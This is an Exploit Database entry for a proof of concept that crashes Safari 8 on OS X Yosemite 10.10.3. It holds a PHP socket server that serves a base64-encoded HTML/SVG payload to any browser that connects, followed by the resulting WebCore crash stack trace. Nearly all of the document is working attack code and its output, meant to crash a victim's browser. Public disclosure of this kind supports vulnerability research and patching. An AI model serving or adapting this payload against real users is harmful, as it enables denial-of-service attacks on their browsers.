Apple Mac OSX 10.10.3 (Yosemite) Safari 8.0.x – Crash (PoC)

• Exploit Database
• 21 阅读

• 作者： Mohammad Reza Espargham
  日期： 2015-06-26
• 类别：

  • dos
  平台：

  • osx
• 来源：https://www.exploit-db.com/exploits/37386/

• #!/usr/bin/php
  <?php
  # Title:Safari 8.0.X / OS X Yosemite 10.10.3 Crash Proof Of 
  Concept
  # Product Website:https://www.apple.com/safari/
  # Author :Mohammad Reza Espargham
  # Linkedin :https://ir.linkedin.com/in/rezasp
  # E-Mail :me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
  # Website:www.reza.es
  # Twitter:https://twitter.com/rezesp
  # FaceBook :https://www.facebook.com/mohammadreza.espargham
  
  
  
  # Usage :
  # php poc.php
  # Open Safari and open ip:8080 / 127.0.0.1:8080
  # Crashed ;)
  
  #Main POC Code
  $reza = socket_create(AF_INET, SOCK_STREAM, 0) or die('Failed to create 
  socket!');
  socket_bind($reza, 0,8080);
  socket_listen($reza);
  print "\nNow Open Safari and open ip:8080 / 127.0.0.1:8080\n\n";
  $msg = 
  'PGh0bWw+CjxzdHlsZT4Kc3ZnIHsKICAgIHBhZGRpbmctdG9wOiAxMzk0JTsKICAgIGJveC1zaXppbmc6IGJvcmRlci1ib3g7Cn0KPC9zdHlsZT4KPHN2ZyB2aWV3Qm94PSIxIDIgNTAwIDUwMCIgd2lkdGg9IjkwMCIgaGVpZ2h0PSI5MDAiPgo8cG9seWxpbmUgcG9pbnRzPSIxIDEsMiAyIj48L3BvbHlsaW5lPgo8L3N2Zz4KPC9odG1sPg==';
  $msgd=base64_decode($msg);
  for (;;) {
   if ($client = @socket_accept($reza)) {
   socket_write($client, "HTTP/1.1 200 OK\r\n" .
   "Content-length: " . strlen($msgd) . "\r\n" .
   "Content-Type: text/html; charset=UTF-8\r\n\r\n" .
   $msgd);
   }
   else usleep(100000);
  }
  
  
  
  
  
  #Crash Report
  /*
  
  Process Model:
  Multiple Web Processes
  
  
  Thread 0 Crashed:: Dispatch queue: com.apple.main-thread
  0 libsystem_kernel.dylib	0x00007fff8e628286 __pthread_kill + 
  10
  1 libsystem_c.dylib 	0x00007fff90619b53 abort + 129
  2 libsystem_c.dylib 	0x00007fff905e1c39 __assert_rtn + 321
  3 com.apple.CoreGraphics	0x00007fff87716e4e 
  CGPathCreateMutableCopyByTransformingPath + 242
  4 com.apple.CoreGraphics	0x00007fff8773aff0 CGContextAddPath + 
  93
  5 com.apple.WebCore 	0x0000000104ea8c84 
  WebCore::GraphicsContext::fillPath(WebCore::Path const&) + 148
  6 com.apple.WebCore 	0x000000010597e851 
  WebCore::RenderSVGResourceSolidColor::postApplyResource(WebCore::RenderElement&, 
  WebCore::GraphicsContext*&, unsigned short, WebCore::Path const*, 
  WebCore::RenderSVGShape const*) + 65
  7 com.apple.WebCore 	0x000000010597f08a 
  WebCore::RenderSVGShape::fillShape(WebCore::RenderStyle const&, 
  WebCore::GraphicsContext*) + 122
  8 com.apple.WebCore 	0x000000010597f3c3 
  WebCore::RenderSVGShape::fillStrokeMarkers(WebCore::PaintInfo&) + 131
  9 com.apple.WebCore 	0x0000000104fa73cb 
  WebCore::RenderSVGShape::paint(WebCore::PaintInfo&, WebCore::LayoutPoint 
  const&) + 379
  10com.apple.WebCore 	0x0000000104fa7062 
  WebCore::RenderSVGRoot::paintReplaced(WebCore::PaintInfo&, 
  WebCore::LayoutPoint const&) + 1330
  11com.apple.WebCore 	0x0000000104f1ee72 
  WebCore::RenderReplaced::paint(WebCore::PaintInfo&, WebCore::LayoutPoint 
  const&) + 722
  12com.apple.WebCore 	0x0000000105429e88 
  WebCore::InlineElementBox::paint(WebCore::PaintInfo&, 
  WebCore::LayoutPoint const&, WebCore::LayoutUnit, WebCore::LayoutUnit) + 
  312
  13com.apple.WebCore 	0x0000000104ea4a63 
  WebCore::InlineFlowBox::paint(WebCore::PaintInfo&, WebCore::LayoutPoint 
  const&, WebCore::LayoutUnit, WebCore::LayoutUnit) + 1251
  14com.apple.WebCore 	0x0000000104ea4509 
  WebCore::RootInlineBox::paint(WebCore::PaintInfo&, WebCore::LayoutPoint 
  const&, WebCore::LayoutUnit, WebCore::LayoutUnit) + 89
  15com.apple.WebCore 	0x0000000104e53d96 
  WebCore::RenderLineBoxList::paint(WebCore::RenderBoxModelObject*, 
  WebCore::PaintInfo&, WebCore::LayoutPoint const&) const + 694
  16com.apple.WebCore 	0x0000000104e51373 
  WebCore::RenderBlock::paintContents(WebCore::PaintInfo&, 
  WebCore::LayoutPoint const&) + 67
  17com.apple.WebCore 	0x0000000104e50724 
  WebCore::RenderBlock::paintObject(WebCore::PaintInfo&, 
  WebCore::LayoutPoint const&) + 420
  18com.apple.WebCore 	0x0000000104e529af 
  WebCore::RenderBlock::paint(WebCore::PaintInfo&, WebCore::LayoutPoint 
  const&) + 287
  19com.apple.WebCore 	0x00000001058db139 
  WebCore::RenderBlock::paintChild(WebCore::RenderBox&, 
  WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::PaintInfo&, 
  bool) + 393
  20com.apple.WebCore 	0x0000000104e51478 
  WebCore::RenderBlock::paintChildren(WebCore::PaintInfo&, 
  WebCore::LayoutPoint const&, WebCore::PaintInfo&, bool) + 72
  21com.apple.WebCore 	0x0000000104e51420 
  WebCore::RenderBlock::paintContents(WebCore::PaintInfo&, 
  WebCore::LayoutPoint const&) + 240
  22com.apple.WebCore 	0x0000000104e50724 
  WebCore::RenderBlock::paintObject(WebCore::PaintInfo&, 
  WebCore::LayoutPoint const&) + 420
  23com.apple.WebCore 	0x0000000104e529af 
  WebCore::RenderBlock::paint(WebCore::PaintInfo&, WebCore::LayoutPoint 
  const&) + 287
  24com.apple.WebCore 	0x0000000104e512b2 
  WebCore::RenderLayer::paintForegroundForFragmentsWithPhase(WebCore::PaintPhase, 
  WTF::Vector<WebCore::LayerFragment, 1ul, WTF::CrashOnOverflow> const&, 
  WebCore::GraphicsContext*, WebCore::RenderLayer::LayerPaintingInfo 
  const&, unsigned int, WebCore::RenderObject*) + 370
  25com.apple.WebCore 	0x0000000104e50f87 
  WebCore::RenderLayer::paintForegroundForFragments(WTF::Vector<WebCore::LayerFragment, 
  1ul, WTF::CrashOnOverflow> const&, WebCore::GraphicsContext*, 
  WebCore::GraphicsContext*, WebCore::LayoutRect const&, bool, 
  WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int, 
  WebCore::RenderObject*, bool, bool) + 423
  26com.apple.WebCore 	0x0000000104e4fc30 
  WebCore::RenderLayer::paintLayerContents(WebCore::GraphicsContext*, 
  WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) + 2576
  27com.apple.WebCore 	0x0000000104e4f002 
  WebCore::RenderLayer::paintLayer(WebCore::GraphicsContext*, 
  WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) + 1010
  28com.apple.WebCore 	0x0000000104e4fd62 
  WebCore::RenderLayer::paintLayerContents(WebCore::GraphicsContext*, 
  WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) + 2882
  29com.apple.WebCore 	0x0000000104e7ac36 
  WebCore::RenderLayerBacking::paintIntoLayer(WebCore::GraphicsLayer 
  const*, WebCore::GraphicsContext*, WebCore::IntRect const&, unsigned 
  int, unsigned int) + 358
  30com.apple.WebCore 	0x000000010593757f 
  WebCore::RenderLayerBacking::paintContents(WebCore::GraphicsLayer 
  const*, WebCore::GraphicsContext&, unsigned int, WebCore::FloatRect 
  const&) + 799
  31com.apple.WebCore 	0x000000010537dd44 
  WebCore::GraphicsLayer::paintGraphicsLayerContents(WebCore::GraphicsContext&, 
  WebCore::FloatRect const&) + 132
  32com.apple.WebCore 	0x00000001058b6ad9 
  WebCore::PlatformCALayer::drawLayerContents(CGContext*, 
  WebCore::PlatformCALayer*, WTF::Vector<WebCore::FloatRect, 5ul, 
  WTF::CrashOnOverflow>&) + 361
  33com.apple.WebCore 	0x0000000105b170a7 
  WebCore::TileGrid::platformCALayerPaintContents(WebCore::PlatformCALayer*, 
  WebCore::GraphicsContext&, WebCore::FloatRect const&) + 167
  34com.apple.WebCore 	0x0000000105ba36cc -[WebSimpleLayer 
  drawInContext:] + 172
  35com.apple.QuartzCore	0x00007fff8d7033c7 
  CABackingStoreUpdate_ + 3306
  36com.apple.QuartzCore	0x00007fff8d7026d7 
  ___ZN2CA5Layer8display_Ev_block_invoke + 59
  37com.apple.QuartzCore	0x00007fff8d702694 
  x_blame_allocations + 81
  38com.apple.QuartzCore	0x00007fff8d6f643c 
  CA::Layer::display_() + 1546
  39com.apple.WebCore 	0x0000000105ba35eb -[WebSimpleLayer 
  display] + 43
  40com.apple.QuartzCore	0x00007fff8d6f47fd 
  CA::Layer::display_if_needed(CA::Transaction*) + 603
  41com.apple.QuartzCore	0x00007fff8d6f3e81 
  CA::Layer::layout_and_display_if_needed(CA::Transaction*) + 35
  42com.apple.QuartzCore	0x00007fff8d6f3612 
  CA::Context::commit_transaction(CA::Transaction*) + 242
  43com.apple.QuartzCore	0x00007fff8d6f33ae 
  CA::Transaction::commit() + 390
  44com.apple.QuartzCore	0x00007fff8d701f19 
  CA::Transaction::observer_callback(__CFRunLoopObserver*, unsigned long, 
  void*) + 71
  45com.apple.CoreFoundation	0x00007fff869f7127 
  __CFRUNLOOP_IS_CALLING_OUT_TO_AN_OBSERVER_CALLBACK_FUNCTION__ + 23
  46com.apple.CoreFoundation	0x00007fff869f7080 
  __CFRunLoopDoObservers + 368
  47com.apple.CoreFoundation	0x00007fff869e8bf8 
  CFRunLoopRunSpecific + 328
  48com.apple.HIToolbox 	0x00007fff8df1156f 
  RunCurrentEventLoopInMode + 235
  49com.apple.HIToolbox 	0x00007fff8df112ea 
  ReceiveNextEventCommon + 431
  50com.apple.HIToolbox 	0x00007fff8df1112b 
  _BlockUntilNextEventMatchingListInModeWithFilter + 71
  51com.apple.AppKit	0x00007fff8ebe59bb _DPSNextEvent + 
  978
  52com.apple.AppKit	0x00007fff8ebe4f68 -[NSApplication 
  nextEventMatchingMask:untilDate:inMode:dequeue:] + 346
  53com.apple.AppKit	0x00007fff8ebdabf3 -[NSApplication 
  run] + 594
  54com.apple.AppKit	0x00007fff8eb57354 NSApplicationMain 
  + 1832
  55libxpc.dylib	0x00007fff8ab77958 _xpc_objc_main + 
  793
  56libxpc.dylib	0x00007fff8ab79060 xpc_main + 490
  57com.apple.WebKit.WebContent 	0x0000000103f10b40 0x103f10000 + 2880
  58libdyld.dylib 	0x00007fff873e45c9 start + 1
  */
  ?>